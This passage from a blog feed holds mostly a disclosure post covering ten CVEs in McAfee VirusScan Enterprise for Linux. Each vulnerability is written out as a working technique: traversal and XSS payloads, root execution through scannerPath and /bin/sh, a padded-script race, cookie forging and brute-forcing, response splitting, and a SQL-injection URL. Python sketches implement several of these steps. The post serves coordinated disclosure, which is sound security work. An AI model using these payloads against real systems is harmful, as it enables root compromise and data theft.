symbolic execution engines, and forced execution don’t make much sense in the context of a neural network,
but novel classes of static and dynamic analysis tools will certainly be critical in this space in the
years to come.</p>

<p>In the CTF space, many tools were initially developed to help competitors solve toy problems
before being adopted by the wider security community and extended to real-world problems.
By promoting more CTF-style AI challenges like this one, I hope we’ll see a similar evolution
with AI security tools. Competitions over fake internet points can drive innovation in
surprising ways and I’m excited to see what this community comes up with.</p>

<p>Finally, I’d like to thank Ziyad at Anthropic for creating this challenge and providing the opportunity
to learn something new. I hope this write-up helps other reverse engineers who are looking to break
into the world of AI security research.</p>

<p>Please share your thoughts, feedback, or suggestions for improvement in the comments below. Thanks for reading!</p>]]></content><author><name>Andrew Fasano</name></author><category term="CTF" /><category term="AI" /><category term="Security" /><category term="Reverse Engineering" /><summary type="html"><![CDATA[Back in my pre-grad school days, I loved competing in security capture the flag (CTF) competitions. I frequently competed with RPISEC and led the Lab RATs team to DEF CON CTF finals before I “retired” to focus on my PhD. I loved the challenge of reverse engineering and exploitation puzzles, but knew I wouldn’t have time to focus on them during grad school.]]></summary></entry><entry><title type="html">10 Vulnerabilities in McAfee VirusScan for Linux</title><link href="http://nation.state.actor/2016/12/05/mcafee.html" rel="alternate" type="text/html" title="10 Vulnerabilities in McAfee VirusScan for Linux" /><published>2016-12-05T00:00:00+00:00</published><updated>2016-12-05T00:00:00+00:00</updated><id>http://nation.state.actor/2016/12/05/mcafee</id><content type="html" xml:base="http://nation.state.actor/2016/12/05/mcafee.html"><![CDATA[<p>A system running <a href="http://www.mcafee.com/us/products/virusscan-enterprise-for-linux.aspx">Intel’s McAfee VirusScan Enterprise for Linux</a> can be compromised by remote attackers due to a number of security vulnerabilities. Some of these vulnerabilities can be chained together to allow <strong><a href="#root">remote code execution as root</a></strong>.</p>

<h3 id="versions-affected">Versions Affected</h3>
<p>The vulnerabilities described here are present from at least version 1.9.2 (released 2/19/2015) through version 2.0.2 (released 4/22/2016). The only difference from the older release appears to be an update to a newer version of libc, which makes exploiting these vulnerabilities easier.</p>

<hr />

<h2 id="timeline">Timeline</h2>

<table>
  <thead>
    <tr>
      <th>Date</th>
      <th>Event</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>June 23, 2016</td>
      <td>Vulnerabilities reported to CERT/CC. Public disclosure scheduled for August 23</td>
    </tr>
    <tr>
      <td>July 19, 2016</td>
      <td>McAfee asks for extension until September, or possibly December</td>
    </tr>
    <tr>
      <td>September 2016</td>
      <td>No contact from McAfee</td>
    </tr>
    <tr>
      <td>October 2016</td>
      <td>No contact from McAfee</td>
    </tr>
    <tr>
      <td>November 2016</td>
      <td>No contact from McAfee</td>
    </tr>
    <tr>
      <td>December 5, 2016</td>
      <td>McAfee informed of December 12th publication date</td>
    </tr>
    <tr>
      <td>December 9, 2016</td>
      <td>McAfee publishes <a href="https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10181">security bulletin</a> and assigns CVE IDs</td>
    </tr>
    <tr>
      <td>December 12, 2016</td>
      <td>This post published</td>
    </tr>
    <tr>
      <td>December 12, 2016</td>
      <td>CERT/CC releases <a href="http://www.kb.cert.org/vuls/id/245327">Vulnerability Note VU#245327</a> describing these vulnerabilities</td>
    </tr>
  </tbody>
</table>

<hr />

<h2 id="intro">Intro</h2>
<p>At first glance, Intel’s McAfee VirusScan Enterprise for Linux has all the best characteristics that vulnerability researchers love: it runs as root, it claims to make your machine more secure, it’s not particularly popular, and it looks like it hasn’t been updated in a long time. When I noticed all these, I decided to take a look.</p>

<hr />

<h2 id="system-architecture">System Architecture</h2>
<p>Before getting into the details of the vulnerabilities in this product, it helps to have a quick understanding of the system architecture.</p>

<h3 id="services">Services</h3>
<p>This product contains two separate services: one running as <strong>root</strong> and one running as an unprivileged user called <strong>nails</strong>. The main scanner service runs as <strong>root</strong> and listens on a local Unix socket at <code class="language-plaintext highlighter-rouge">/var/opt/NAI/LinuxShield/dev/nails_monitor</code>. The webserver runs as the <strong>nails</strong> user and listens on <code class="language-plaintext highlighter-rouge">0.0.0.0:55443</code>.</p>

<h3 id="interprocess-communication">Interprocess Communication</h3>
<p>The webserver is essentially a UI on top of the scanner service. When a user makes a request to the webserver, the request is reformatted and sent to the root service, and the response is then rendered into an HTML template and shown to the user. The web interface does little to limit what data a malicious user can send to the root service.</p>

<hr />

<h2 id="vulnerabilities">Vulnerabilities</h2>
<p>These ten vulnerabilities are described in this section:</p>
<ol>
  <li><a href="#vuln1">CVE-2016-8016: Remote Unauthenticated File Existence Test</a></li>
  <li><a href="#vuln2">CVE-2016-8017: Remote Unauthenticated File Read (with Constraints)</a></li>
  <li><a href="#vuln3">CVE-2016-8018: No Cross-Site Request Forgery Tokens</a></li>
  <li><a href="#vuln4">CVE-2016-8019: Cross Site Scripting</a></li>
  <li><a href="#vuln5">CVE-2016-8020: Authenticated Remote Code Execution &amp; Privilege Escalation</a></li>
  <li><a href="#vuln6">CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location</a></li>
  <li><a href="#vuln7">CVE-2016-8022: Remote Use of Authentication Tokens</a></li>
  <li><a href="#vuln8">CVE-2016-8023: Brute Force Authentication Tokens</a></li>
  <li><a href="#vuln9">CVE-2016-8024: HTTP Response Splitting</a></li>
  <li><a href="#vuln10">CVE-2016-8025: Authenticated SQL Injection</a></li>
</ol>

<p>When chained together, these vulnerabilities allow a <strong><a href="#root">remote attacker to execute code as root</a></strong>.</p>

<hr />

<h3 id="vulnerability-1-cve-2016-8016-remote-unauthenticated-file-existence-test">Vulnerability 1 (CVE-2016-8016): Remote Unauthenticated File Existence Test</h3>
<p><img src="/images/burp_tasks_html.png" alt="Burp Tasks HTML" /></p>

<p>When browsing to many sections of the web interface, an HTML file path is specified in the <code class="language-plaintext highlighter-rouge">tplt</code> parameter; in the figure above, <code class="language-plaintext highlighter-rouge">tplt</code> is set to <code class="language-plaintext highlighter-rouge">tasks.html</code>. Running strace on the webserver shows that this causes it to open <code class="language-plaintext highlighter-rouge">/opt/NAI/LinuxShield/apache/htdocs/0409/tasks.html</code>, as shown here:
<img src="/images/strace_open_tasks_html.png" alt="Strace Open Tasks HTML" /></p>

<p>If the <code class="language-plaintext highlighter-rouge">tplt</code> parameter is set to a different page, such as <code class="language-plaintext highlighter-rouge">..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd</code> (the URL-encoded form of the string <code class="language-plaintext highlighter-rouge">../../../../../../etc/passwd</code>), the response is a badly formatted page with an error variable set to 14. The JavaScript function <code class="language-plaintext highlighter-rouge">lookupErrorCode</code> maps error 14 to the string “Badly Formed Web Template.” If the <code class="language-plaintext highlighter-rouge">tplt</code> variable is set to a relative path that doesn’t exist, the error variable is set to 10, which corresponds to the string “cannot open file”.
<img src="/images/js_bad_template_vs_file.png" alt="JS Bad Template vs File" />
<img src="/images/strace_no_file_vs_file.png" alt="Strace No File vs File" /></p>

<p>Because the two error messages differ, an unauthenticated remote user can determine whether a file with a given name exists on the system.</p>
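<p>The existence oracle can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions: it only builds the URL-encoded <code class="language-plaintext highlighter-rouge">tplt</code> value and interprets the two error codes observed above (14 and 10). How the error code is pulled out of the response page, and the other parameters the interface sends with the request, are left out; the helper names are hypothetical.</p>

```python
from typing import Optional
from urllib.parse import quote

# Error codes observed in the web interface (mapped by lookupErrorCode)
BADLY_FORMED_TEMPLATE = 14  # file was opened but is not a valid template
CANNOT_OPEN_FILE = 10       # file could not be opened


def traversal_tplt(target_path: str, depth: int = 6) -> str:
    """Build a URL-encoded relative path that climbs out of htdocs/0409/."""
    relative = "../" * depth + target_path.lstrip("/")
    # safe="" percent-encodes '/' as %2F, matching the example value above
    return quote(relative, safe="")


def file_exists(error_code: int) -> Optional[bool]:
    """Interpret the error code returned for a traversal path."""
    if error_code == BADLY_FORMED_TEMPLATE:
        return True
    if error_code == CANNOT_OPEN_FILE:
        # Assumption: a file the nails user cannot read may also land here
        return False
    return None  # any other code is treated as inconclusive
```

<p>For example, <code class="language-plaintext highlighter-rouge">traversal_tplt("/etc/passwd")</code> yields the same encoded value used in the request above.</p>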

<p>This leads to the question of what is different between the valid web templates (such as tasks.html) and invalid template files (such as /etc/passwd).</p>

<hr />

<h3 id="vulnerability-2-cve-2016-8017-remote-unauthenticated-file-read-with-constraints">Vulnerability 2 (CVE-2016-8017): Remote Unauthenticated File Read (with Constraints)</h3>
<p>Looking at various template files used by the webserver, it’s easy to see that valid template files either contain the magic string <code class="language-plaintext highlighter-rouge">__REPLACE_THIS__</code> or have the two tags <code class="language-plaintext highlighter-rouge">[%</code> and <code class="language-plaintext highlighter-rouge">%]</code> with any string between them.</p>

<p>If an attacker is able to place these strings into a file on the system (which may be trivial for log files), the attacker can then use the webserver to remotely read the entire file. A limitation of this vulnerability is that the files are read by the <strong>nails</strong> user, so only files readable by that user can be retrieved.</p>
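<p>The template rule inferred above can be written as a small predicate for deciding which files this vulnerability could expose. It is a heuristic sketch, not the webserver’s actual check: whether the <code class="language-plaintext highlighter-rouge">[%</code> and <code class="language-plaintext highlighter-rouge">%]</code> tags must sit on the same line is not known, and the pattern below assumes they may span lines.</p>

```python
import re

MAGIC = "__REPLACE_THIS__"
# "[%" followed later by "%]"; DOTALL lets the pair span lines (an assumption)
TAG_PAIR = re.compile(r"\[%.*?%\]", re.DOTALL)


def readable_as_template(contents: str) -> bool:
    """Heuristic: would the webserver accept this file as a template?"""
    return MAGIC in contents or TAG_PAIR.search(contents) is not None
```

<p>For instance, a log line that records attacker-supplied input such as <code class="language-plaintext highlighter-rouge">[%x%]</code> would satisfy the second condition.</p>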

<hr />

<h3 id="vulnerability-3-cve-2016-8018-no-cross-site-request-forgery-tokens">Vulnerability 3 (CVE-2016-8018): No Cross-Site Request Forgery Tokens</h3>
<p>There are no CSRF tokens accompanying any forms on the web interface, which allows attackers to submit authenticated requests when an authenticated user browses to an attacker-controlled external domain. Seeing such a basic vulnerability in an antivirus product in 2016 is quite surprising. The lack of CSRF tokens is one of the ways that a remote attacker can exploit a vulnerability that should only be exposed to authenticated users.</p>

<hr />

<h3 id="vulnerability-4-cve-2016-8019-cross-site-scripting">Vulnerability 4 (CVE-2016-8019): Cross Site Scripting</h3>
<p>When <code class="language-plaintext highlighter-rouge">tplt</code> is set to <code class="language-plaintext highlighter-rouge">NailsConfig.html</code> or <code class="language-plaintext highlighter-rouge">MonitorHost.html</code>, parameters <code class="language-plaintext highlighter-rouge">info:7</code> and <code class="language-plaintext highlighter-rouge">info:5</code> both place untrusted user input in a string being passed to the JavaScript function <code class="language-plaintext highlighter-rouge">formatData</code>. A typical value for <code class="language-plaintext highlighter-rouge">info:7</code> is a list of strings such as <code class="language-plaintext highlighter-rouge">single,show,serverUtcOffset=-25200</code>. This is then placed into a single-quoted string passed to <code class="language-plaintext highlighter-rouge">formatData</code>. If the <code class="language-plaintext highlighter-rouge">info:7</code> parameter is set to something like <code class="language-plaintext highlighter-rouge">single'.prototype.constructor=eval('alert("xss")')+</code>, the eval function will evaluate arbitrary malicious JavaScript before formatData is called.
<img src="/images/xss_req.png" alt="XSS Request" />
The resulting page executes the injected code and alerts the message “xss”.
<img src="/images/xss_resp.png" alt="XSS Response" /></p>

<hr />

<h3 id="vulnerability-5-cve-2016-8020-authenticated-remote-code-execution--privilege-escalation">Vulnerability 5 (CVE-2016-8020): Authenticated Remote Code Execution &amp; Privilege Escalation</h3>
<p>Starting a scan of the system requires filling out four pages’ worth of forms.
<img src="/images/scan1.png" alt="Scan Step 1" />
<img src="/images/scan2.png" alt="Scan Step 2" />
<img src="/images/scan3.png" alt="Scan Step 3" />
<img src="/images/scan4.png" alt="Scan Step 4" /></p>

<p>When the final page of the form is submitted, a large request is sent to the server. A subset of the posted parameters is shown here:
<img src="/images/scan_props2.png" alt="Scan Properties" /></p>

<p>The <code class="language-plaintext highlighter-rouge">nailsd.profile.ODS_9.scannerPath</code> variable contains the path that the system will execute to run the scan. Modifying the value to <code class="language-plaintext highlighter-rouge">/bin/sh</code> generates the following error in the web interface:
<img src="/images/cmd_inject_err.png" alt="Command Inject Error" /></p>

<p>Attaching strace shows that this parameter is passed directly to execve from a process running as <strong>root</strong>.
<img src="/images/strace_execve.png" alt="Strace Execve" /></p>

<p>By changing this variable to the path of an executable on the system, an authenticated user can have that binary executed by the root user. It would be easy to combine this with the XSS or CSRF vulnerabilities described above to exploit it without authentication.</p>

<p>This can’t easily be extended into arbitrary code execution because multiple arguments are passed to the binary. However, the <code class="language-plaintext highlighter-rouge">scannerPath</code> variable is not the only variable passed directly from the webserver to execve; while some values are hard-coded, four are entirely attacker-controlled, leading to the following command:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[scannerPath] -e [enginePath] -D [datPath] -L [engineLibDir] -p 21 -i 2 -I 0
</code></pre></div></div>

<p>One vector to exploit this is through <code class="language-plaintext highlighter-rouge">/bin/sh</code>: sh treats <code class="language-plaintext highlighter-rouge">-e</code> as an option (exit on error) and then loads and executes the shell script named by the following argument, the attacker-controlled <code class="language-plaintext highlighter-rouge">enginePath</code>. A local user could use this to escalate privileges, but a remote attacker would need a way to place a malicious shell script onto the system.</p>
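<p>The effect of pointing <code class="language-plaintext highlighter-rouge">scannerPath</code> at <code class="language-plaintext highlighter-rouge">/bin/sh</code> can be checked locally, without the McAfee product, using a short Python sketch. It builds the argument vector in the order shown above and runs it against a harmless stand-in script to show which argument sh executes. The helper names, the script, and the <code class="language-plaintext highlighter-rouge">/tmp</code> placeholder paths are hypothetical.</p>

```python
import os
import subprocess
import tempfile


def build_scan_argv(scanner_path, engine_path, dat_path, engine_lib_dir):
    """Argument vector in the order shown above; four values are attacker-controlled."""
    return [scanner_path, "-e", engine_path, "-D", dat_path,
            "-L", engine_lib_dir, "-p", "21", "-i", "2", "-I", "0"]


def run_with_sh(script_body: str) -> str:
    """Execute the argv with /bin/sh as scannerPath and a local script as enginePath."""
    with tempfile.NamedTemporaryFile("w", suffix=".sh", delete=False) as f:
        f.write(script_body)
        script = f.name
    try:
        argv = build_scan_argv("/bin/sh", script, "/tmp/dat", "/tmp/lib")
        # sh consumes -e as "exit on error", runs `script`, and passes -D ... as $1..$n
        result = subprocess.run(argv, capture_output=True, text=True, check=True)
        return result.stdout
    finally:
        os.unlink(script)
```

<p>Running <code class="language-plaintext highlighter-rouge">run_with_sh('echo "$1"\n')</code> prints <code class="language-plaintext highlighter-rouge">-D</code>: everything after the script path becomes a positional parameter, so the hard-coded arguments do not get in the way.</p>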

<hr />

<h3 id="vulnerability-6-cve-2016-8021-web-interface-allows-arbitrary-file-write-to-known-location">Vulnerability 6 (CVE-2016-8021): Web Interface Allows Arbitrary File Write to Known Location</h3>
<p>The web interface allows users to specify an update server and request updates from it. Since I wanted to find a way for a remote user to write a file to the system, this seemed like it might be a useful feature.</p>

<p>To see how the update server was used, I cloned McAfee’s update repository locally and then reconfigured the application to download updates from my server.
<img src="/images/repos.png" alt="Repositories" /></p>

<p>Two requests are made as part of the update process: first a request to <code class="language-plaintext highlighter-rouge">/SiteStat.xml</code>, then a request to <code class="language-plaintext highlighter-rouge">/catalog.z</code>. The SiteStat file is a standard XML file that says whether a site is enabled and which version of the catalog it is serving. Presumably, an update is only downloaded if this version is newer than the one the application last updated from. The <code class="language-plaintext highlighter-rouge">catalog.z</code> file looks like a <a href="http://www.mcafee.com/us/downloads/endpoint-protection/products/epolicy-orchestrator.aspx">McAfee ePolicy Orchestrator file</a> and is mostly binary data. I assumed that it used sound cryptography and that updates were signed, so there would be no way to push down a malicious update to compromise a system. Instead, I wanted to use this feature to push down a shell script to later execute with the previous vulnerability.</p>

<p>The log files claim that the update process consists of downloading a file, verifying its integrity, unzipping it, and installing it.
<img src="/images/downloading_update.png" alt="Downloading Update" /></p>

<p>Because the downloaded file is written to a known location before its integrity is verified, and the application isn’t single-threaded, we can race this logic: make the program download a large file to <code class="language-plaintext highlighter-rouge">/opt/McAfee/cma/scratch/update/catalog.z</code>, then use <a href="#vuln5">Vulnerability 5</a> to execute it before the download finishes or before the verification runs.</p>

<p>It’s trivial to generate a shell script that takes a while to download but executes a given payload if it is run before the download finishes. This can be done by creating a script that contains the desired payload followed by a large comment.</p>
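<p>A padded script of this kind can be generated with a short Python sketch, along with a helper that simulates executing it when only part of the file has arrived. The function names and the 50 MB default are hypothetical. The <code class="language-plaintext highlighter-rouge">exit 0</code> after the payload is an extra safeguard not described above; it makes sh stop before parsing any of the padding, even a comment line cut off mid-download.</p>

```python
import os
import subprocess
import tempfile


def padded_script(payload: str, padding_bytes: int = 50 * 1024 * 1024) -> bytes:
    """Shell script: payload first, then a large block of comments as padding."""
    # `exit 0` (an addition) stops sh before it reads any of the padding
    header = "#!/bin/sh\n" + payload.rstrip("\n") + "\nexit 0\n"
    line = "#" + "A" * 63 + "\n"  # one 65-byte comment line
    count = padding_bytes // len(line) + 1
    return (header + line * count).encode()


def run_partial(script: bytes, received: int) -> str:
    """Execute only the first `received` bytes, as if the download were unfinished."""
    with tempfile.NamedTemporaryFile("wb", delete=False) as f:
        f.write(script[:received])
        path = f.name
    try:
        result = subprocess.run(["/bin/sh", path], capture_output=True, text=True)
        return result.stdout
    finally:
        os.unlink(path)
```

<p>Running <code class="language-plaintext highlighter-rouge">run_partial(padded_script("echo payload ran", 10000), 200)</code> prints the payload’s output even though the file is truncated in the middle of the padding.</p>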

<p>Combining vulnerabilities 5 and 6 now gives us a privilege escalation from the <strong>nails</strong> user to <strong>root</strong>. Using CSRF or XSS, it would be possible to use these vulnerabilities to remotely escalate privileges to root.</p>

<hr />

<h3 id="vulnerability-7-cve-2016-8022-remote-use-of-authentication-tokens">Vulnerability 7 (CVE-2016-8022): Remote Use of Authentication Tokens</h3>
<p>In an attempt to develop an XSS and CSRF exploit, I threw together a simple cookie stealer and took a cookie from an authenticated user. But when I tried to use the cookie from my “attacker” machine, my authentication was denied:
<img src="/images/bad_creds.png" alt="Bad Credentials" /></p>

<p>After confirming that the token worked on the original machine, I thought that the authentication tokens might be limited to a specific IP address. This would make writing an exploit more difficult, but it could still all be done via XSS using JavaScript in a victim’s browser.</p>

<p>When a user authenticates through the website, a message is passed over a Unix socket to the root service. The root service validates the credentials and returns its result to the webserver. To find out what was going wrong when a remote machine used my cookie, I used <code class="language-plaintext highlighter-rouge">socat</code> to man-in-the-middle the socket and see the messages.</p>

<p>This script restarts nails and intercepts all of its communications on the socket:
<script src="https://gist.github.com/AndrewFasano/582620995c948a9abdfd213ac1a85e71.js"></script></p>

<p>Now we could see what was different between the two requests.</p>

<h4 id="valid-request">Valid request</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt; 2015/07/30 11:14:28.119036 length=70 from=0 to=69
+OK welcome to the NAILS Monitor Service &lt;19224.2214.1438280068.161&gt;\r

2015/07/30 11:14:28.119326 length=54 from=0 to=53
auth 2259618965-19224.2214.1438280068.161-2259618965\r
&lt; 2015/07/30 11:14:28.119399 length=31 from=70 to=100
+OK successful authentication\r
2015/07/30 11:14:28.137344 length=66 from=54 to=119
cred 127.0.0.1/nails/1438280067/1438279968-checksum//0 127.0.0.1\r
&lt; 2015/07/30 11:14:28.137530 length=20 from=101 to=120
+OK credentials OK\r

</code></pre></div></div>

<h4 id="invalid-request">Invalid request</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt; 2015/07/30 11:14:28.119036 length=70 from=0 to=69
+OK welcome to the NAILS Monitor Service &lt;19224.2214.1438280068.161&gt;\r

2015/07/30 11:14:28.119326 length=54 from=0 to=53
auth 2259618965-19224.2214.1438280068.161-2259618965\r
&lt; 2015/07/30 11:14:28.119399 length=31 from=70 to=100
+OK successful authentication\r
2015/07/30 11:14:28.137344 length=66 from=54 to=119
cred 127.0.0.1/nails/1438280067/1438279968-checksum//0 [ATTACKER IP]\r
&lt; 2015/07/30 11:14:28.137530 length=20 from=101 to=120
+ERR bad credentials\r
</code></pre></div></div>

<p>It looks like the webserver sends the requester’s IP address along with their cookie when it makes an AUTH request (the <code class="language-plaintext highlighter-rouge">cred</code> line in the logs above). Although it’s a bit unusual, it’s not a terrible security decision.</p>

<p>The cookie is sent over a text-based protocol, followed by some number of spaces and the IP address. But if we modify our cookie so that it ends with a space followed by the victim’s IP address and then a number of spaces, the line will be parsed incorrectly.</p>

<p>Instead of having the message sent on the socket be:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>AUTH [cookie] [ATTACKER IP]
</code></pre></div></div>

<p>We’ll modify our cookie so the message sent is:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>AUTH [stolen cookie + VICTIM IP ] [ATTACKER IP]

</code></pre></div></div>

<p>The service incorrectly parses this line and believes that it’s reading a cookie sent from the victim’s IP address.</p>

<p>The full communication ends up looking like:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt; 2015/07/30 11:14:28.119036 length=70 from=0 to=69
+OK welcome to the NAILS Monitor Service &lt;19224.2214.1438280068.161&gt;\r

2015/07/30 11:14:28.119326 length=54 from=0 to=53
auth 2259618965-19224.2214.1438280068.161-2259618965\r
&lt; 2015/07/30 11:14:28.119399 length=31 from=70 to=100
+OK successful authentication\r
2015/07/30 11:14:28.137344 length=66 from=54 to=119
cred 127.0.0.1/nails/1438280067/1438279968-checksum//0 127.0.0.1 10.0.0.130\r
&lt; 2015/07/30 11:14:28.137530 length=20 from=101 to=120
+OK credentials OK\r
</code></pre></div></div>
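<p>The logged behavior is consistent with a root service that splits the <code class="language-plaintext highlighter-rouge">cred</code> line on whitespace, reads the cookie and IP address from fixed positions, and ignores any extra fields. The sketch below is a hypothetical model of that parser (the real implementation isn’t available), paired with the webserver side that appends the requester’s IP. The host-field check is borrowed from the Vulnerability 8 findings, and the model ignores the other cookie checks. It reproduces the accepted and rejected cases from the logs.</p>

```python
def build_cred_line(cookie: str, requester_ip: str) -> str:
    """Webserver side: the cookie followed by the requester's IP address."""
    return f"cred {cookie} {requester_ip}"


def service_accepts(line: str) -> bool:
    """Hypothetical model of the root service's check on a cred line."""
    fields = line.split()
    if len(fields) < 3 or fields[0] != "cred":
        return False
    cookie, ip = fields[1], fields[2]  # anything after fields[2] is ignored
    # The [host] part of the cookie must match the IP (see Vulnerability 8)
    return cookie.split("/", 1)[0] == ip
```

<p>Appending <code class="language-plaintext highlighter-rouge">" 127.0.0.1"</code> to a stolen cookie pushes the attacker’s real address into the ignored fourth field.</p>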

<hr />

<h3 id="vulnerability-8-cve-2016-8023-brute-force-authentication-tokens">Vulnerability 8 (CVE-2016-8023): Brute Force Authentication Tokens</h3>
<p>After seeing the previous cookie-parsing logic fail, I wanted to test how well the other cookie validation logic worked.</p>

<p>Here are a few sample values for the <code class="language-plaintext highlighter-rouge">nailsSessionId</code> cookies that were generated by logging in and out for the <strong>nails</strong> account:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>127.0.0.1/nails/1459548338/1459548277-checksum//0
127.0.0.1/nails/1459549661/1459549629-checksum//0
127.0.0.1/nails/1459549695/1459549629-checksum//0
</code></pre></div></div>

<p>Only two parts of the cookie seem to change between typical login attempts. The cookie format seems to be:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[host]/[username]/[SECRET1]/[SECRET2]-checksum//[Zero]
</code></pre></div></div>

<p>Where typical values are as follows:</p>

<table>
  <thead>
    <tr>
      <th>Variable</th>
      <th>Description</th>
      <th>Observed Values</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>[host]</td>
      <td>An IP Address</td>
      <td>0.0.0.0 or 127.0.0.1</td>
    </tr>
    <tr>
      <td>[username]</td>
      <td>The username of the logged-in user.</td>
      <td>nails</td>
    </tr>
    <tr>
      <td>[SECRET1]</td>
      <td>Unix time at which the cookie was assigned</td>
      <td>1435067777</td>
    </tr>
    <tr>
      <td>[SECRET2]</td>
      <td>Unix time at which the server was started</td>
      <td>1435066996</td>
    </tr>
    <tr>
      <td>[Zero]</td>
      <td>The number 0</td>
      <td>0</td>
    </tr>
  </tbody>
</table>

<p>Using a timestamp as a secret value is a bad idea since it could be brute-forced, but using two in conjunction would normally make this difficult. Fortunately, that’s not the case here. Some basic testing found that the acceptable values for these fields differed significantly from what they were typically set to:</p>

<table>
  <thead>
    <tr>
      <th>Variable</th>
      <th>Acceptable Value</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>[host]</td>
      <td>IP address request is sent from</td>
    </tr>
    <tr>
      <td>[username]</td>
      <td>Any string</td>
    </tr>
    <tr>
      <td>[SECRET1]</td>
      <td>Any number</td>
    </tr>
    <tr>
      <td>[SECRET2]</td>
      <td>Unix time at which the server was started</td>
    </tr>
    <tr>
      <td>[Zero]</td>
      <td>Blank</td>
    </tr>
  </tbody>
</table>

<p>This leaves only one value to brute-force: the time at which the server was started. We can start at the current time and decrement the <code class="language-plaintext highlighter-rouge">DATE</code> value in the following cookie until we successfully authenticate:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Attacker IP]/n/0/[DATE]-checksum//

</code></pre></div></div>
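<p>The candidate cookies for this search can be generated with a short Python sketch. It assumes the server clock is close to the attacker’s and that the cookie format is exactly the one above; the code that sends each candidate in the <code class="language-plaintext highlighter-rouge">nailsSessionId</code> cookie and detects a successful login is left out, and the function name is hypothetical. A server started one day earlier needs at most 86,400 guesses.</p>

```python
import time
from typing import Iterator, Optional


def candidate_cookies(attacker_ip: str, max_seconds: int,
                      now: Optional[int] = None) -> Iterator[str]:
    """Yield cookies guessing the server start time from `now` backwards."""
    start = int(time.time()) if now is None else now
    for started in range(start, start - max_seconds, -1):
        # [host]/[username]/[SECRET1]/[SECRET2]-checksum//[Zero]
        # username "n", SECRET1 "0", and a blank final field, per the table above
        yield f"{attacker_ip}/n/0/{started}-checksum//"
```

<p>Using a generator keeps memory constant however far back the search goes.</p>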

<hr />

<h3 id="vulnerability-9-cve-2016-8024-http-response-splitting">Vulnerability 9 (CVE-2016-8024): HTTP Response Splitting</h3>
<p>Users can export a CSV of all log data from the “System Events” page by clicking an export button which just makes a GET request.
<img src="/images/export_csv.png" alt="Export CSV" /></p>

<p>When this request is sent, one of the parameters is <code class="language-plaintext highlighter-rouge">info%3A0</code> (<code class="language-plaintext highlighter-rouge">info:0</code> URL-encoded). This parameter typically holds the value <code class="language-plaintext highlighter-rouge">multi%2Capplication%2Fvnd.ms-excel</code>, and the server responds with the header <code class="language-plaintext highlighter-rouge">Content-Type: application/vnd.ms-excel</code>. An attacker can create a link whose response contains arbitrary headers by simply appending URL-encoded newlines and additional headers to this value.
<img src="/images/splitting_req.png" alt="Splitting Request" />
<img src="/images/splitting_resp.png" alt="Splitting Response" /></p>
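<p>The injected <code class="language-plaintext highlighter-rouge">info:0</code> value can be produced with Python’s <code class="language-plaintext highlighter-rouge">urllib.parse.quote</code>. This is a sketch: the header name <code class="language-plaintext highlighter-rouge">X-Injected</code> is a hypothetical placeholder, and CRLF line breaks are an assumption, since the text above only says that newlines are URL-encoded.</p>

```python
from urllib.parse import quote


def split_info0(extra_headers: dict) -> str:
    """Encode info:0 so the response gains extra headers after Content-Type."""
    value = "multi,application/vnd.ms-excel"
    for name, val in extra_headers.items():
        value += f"\r\n{name}: {val}"  # CRLF before each injected header
    # safe="" also encodes ',' and '/', matching the original multi%2C... value
    return quote(value, safe="")
```

<p>With no extra headers, the function returns the original value unchanged, which is a quick way to check the encoding.</p>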

<hr />

<h3 id="vulnerability-10-cve-2016-8025-authenticated-sql-injection">Vulnerability 10 (CVE-2016-8025): Authenticated SQL Injection</h3>
<p>This system uses a SQLite database to store data about settings and previous scans. Every entry point to this database I looked at was vulnerable to SQL injection. This application appears to translate URL arguments into SQLite commands. Using the CSV-export function mentioned in the discussion of vulnerability 9, we can dump the <code class="language-plaintext highlighter-rouge">sqlite_master</code> table in CSV form simply by visiting a URL. The equivalent of the query <code class="language-plaintext highlighter-rouge">select * from sqlite_master;</code> is embedded in the URL:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>localhost:55443/0409/nails?pg=proxy&amp;tplt=-&amp;addr=127.0.0.1%3A65443&amp;mon%3A0=db+select+_show%3D%24*++_output%3Dcsv+_table%3Dsqlite_master+&amp;info%3A0=multi%2Capplication%2Fvnd.ms-excel
</code></pre></div></div>

<p><img src="/images/sql_db.png" alt="SQL DB" /></p>
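<p>The export URL above can be rebuilt from its decoded parameters with <code class="language-plaintext highlighter-rouge">urllib.parse.urlencode</code>, which makes the embedded <code class="language-plaintext highlighter-rouge">db select</code> command easier to read and modify. Passing <code class="language-plaintext highlighter-rouge">safe="*"</code> keeps the asterisk unescaped, as in the original. The function name and its <code class="language-plaintext highlighter-rouge">table</code> argument are illustrative; the syntax of the <code class="language-plaintext highlighter-rouge">db</code> command beyond this one example isn’t documented here.</p>

```python
from urllib.parse import urlencode

BASE = "localhost:55443/0409/nails"


def export_table_url(table: str) -> str:
    """Build a CSV-export URL whose mon:0 command selects every row of `table`."""
    params = {
        "pg": "proxy",
        "tplt": "-",
        "addr": "127.0.0.1:65443",
        # Decoded form of the command in the example URL above
        "mon:0": f"db select _show=$*  _output=csv _table={table} ",
        "info:0": "multi,application/vnd.ms-excel",
    }
    # urlencode uses quote_plus: spaces become '+', while '=', '$', ':' are %-encoded
    return BASE + "?" + urlencode(params, safe="*")
```

<p><code class="language-plaintext highlighter-rouge">export_table_url("sqlite_master")</code> reproduces the URL above byte for byte.</p>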

<p>The database isn’t used for authentication, only to track which files have been scanned and to store the event log. After exploiting other vulnerabilities to compromise a machine, an attacker could use SQL injection to modify the event log and cover their tracks.</p>

